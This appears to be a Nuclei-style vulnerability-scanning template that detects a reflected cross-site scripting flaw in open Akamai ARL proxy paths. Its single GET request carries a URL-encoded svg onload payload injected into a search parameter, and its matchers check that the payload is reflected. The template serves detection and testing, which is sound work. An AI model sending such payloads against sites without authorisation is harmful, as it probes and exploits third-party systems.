id: akamai-arl-xss

info:
  name: Open Akamai ARL - Cross-Site Scripting
  author: pdteam
  severity: high
  description: Open Akamai ARL contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site.
  reference:
    - https://github.com/war-and-code/akamai-arl-hack
    - https://twitter.com/SpiderSec/status/1421176297548435459
    - https://warandcode.com/post/akamai-arl-hack/
    - https://github.com/cybercdh/goarl
    - https://community.akamai.com/customers/s/article/WebPerformanceV1V2ARLChangeStartingFebruary282021?language=en_US
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    max-request: 1
  tags: Akamai-CDN

http:
  - method: GET
    path:
      - "{{BaseURL}}/7/0/33/1d/www.citysearch.com/search?what=x&where=place%22%3E%3Csvg+onload=confirm(document.domain)%3E"

    matchers-condition: and
    matchers:
      - type: word
        condition: and
        words:
          - '"><svg onload=confirm(document.domain)>'
          - 'Suggestions for improving the results'

      - type: word
        part: header
        words:
          - 'text/html'

# digest: 4a0a0047304502206fd8ef39026affc4b4710769232b180cd8e14a7a99d559e853e35922323da94e022100d7e6f91ddbc0935b3cf3a89fef2dab5920b3061195b6574c641a81ccd7fb91d3:922c64590222798bb761d5b6d8e72950
